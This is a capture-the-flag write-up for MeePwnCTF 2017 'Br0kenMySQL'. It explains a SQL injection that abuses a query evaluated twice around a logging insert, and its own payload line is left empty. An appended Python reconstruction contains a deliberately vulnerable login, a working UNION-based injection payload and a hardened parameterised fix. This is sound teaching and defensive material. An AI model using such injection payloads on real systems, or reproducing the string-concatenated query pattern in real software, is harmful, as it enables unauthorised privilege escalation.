
[MeePwnCTF2017] Br0kenMySQL



So, the task is that the first query must return `$row["username"]` equal to 'guest', while the second query, built from the same input, must return 'admin'. Every time the guest query succeeds, the application adds one new record to the logs table, and that side effect is what we can make use of: an injected expression that depends on the state of the logs table gives a different answer before and after the insert.

1. We have to count the number of rows in the logs table without using the COUNT function.

2. We have to use the IF function inside the UNION SELECT query.

If we change 1=1 to 1=2, the username will be equal to 'guest'.

3. Based on the number of rows in the logs table, we can write a query that checks whether that number equals some value and returns one username or the other accordingly.
Here is our final payload:

After refreshing a few times we finally get the flag.
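The mechanism the write-up relies on, rebuilt as an added example so the two-query bug and its fix can be run locally. This is not the challenge source or the authors' payload: the schema, table and column names, the SQLite in-memory database standing in for MySQL, `CASE` standing in for MySQL's `IF()`, and `MAX(id)` standing in for whatever the authors used to count rows without `COUNT()` are all constructed assumptions. The point is that the same user-controlled SQL string is evaluated twice with a logging write in between, so its value is no longer stable; the hardened version runs one parameterised query and decides on that single row.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the challenge database (SQLite, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL);
        INSERT INTO users (username) VALUES ('guest'), ('admin');
        CREATE TABLE logs (id INTEGER PRIMARY KEY, username TEXT NOT NULL);
    """)
    return db


def login_vulnerable(db, username):
    """Hypothetical reconstruction of the vulnerable flow described in the write-up:
    input is concatenated into SQL, the first result must be 'guest', a row is
    written to logs, and the *same* SQL string is run again and must now be 'admin'.
    Returns 'admin' if both checks pass, otherwise None."""
    sql = "SELECT username FROM users WHERE username = '%s'" % username
    row = db.execute(sql).fetchone()
    if row is None or row[0] != "guest":
        return None
    db.execute("INSERT INTO logs (username) VALUES ('guest')")  # the side effect
    row = db.execute(sql).fetchone()  # same string, but the logs table has changed
    return "admin" if row is not None and row[0] == "admin" else None


def login_hardened(db, username):
    """Fix: bind the value instead of concatenating it, query once, and make the
    authorisation decision on that one row. Injected SQL is just a literal here."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return None
    db.execute("INSERT INTO logs (username) VALUES (?)", (row[0],))
    return row[0]


# Constructed payload in SQLite dialect: the UNION'd row is 'guest' when the
# highest log id is even and 'admin' when it is odd, so an insert between the
# two evaluations flips the answer. MySQL's IF() plays the CASE role in the
# original challenge; MAX(id) here is only a stand-in for a COUNT-free row count.
PAYLOAD = (
    "' UNION SELECT CASE WHEN IFNULL((SELECT MAX(id) FROM logs), 0) % 2 = 0 "
    "THEN 'guest' ELSE 'admin' END -- "
)


def demo():
    """Return the outcome of three attempts against the vulnerable flow and one
    against the hardened flow, illustrating why the write-up needed a few refreshes."""
    db = make_db()
    first = login_vulnerable(db, PAYLOAD)   # logs empty -> 'guest'; after insert -> 'admin'
    second = login_vulnerable(db, PAYLOAD)  # MAX(id)=1 -> 'admin' on the first check -> rejected
    db.execute("INSERT INTO logs (username) VALUES ('someone-else')")  # another visitor
    third = login_vulnerable(db, PAYLOAD)   # parity is back to even -> succeeds again
    safe = login_hardened(db, PAYLOAD)      # bound parameter matches no user -> None
    return first, second, third, safe


if __name__ == "__main__":
    print(demo())  # ('admin', None, 'admin', None)
```

The second attempt fails only because the first one changed the table; on a shared CTF instance other players' requests keep shifting the parity, which is why the write-up talks about refreshing a few times. For detection, the tell-tale signs are a request whose username contains SQL keywords and a logs insert that is immediately followed by a privilege change for a different user than the one logged.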

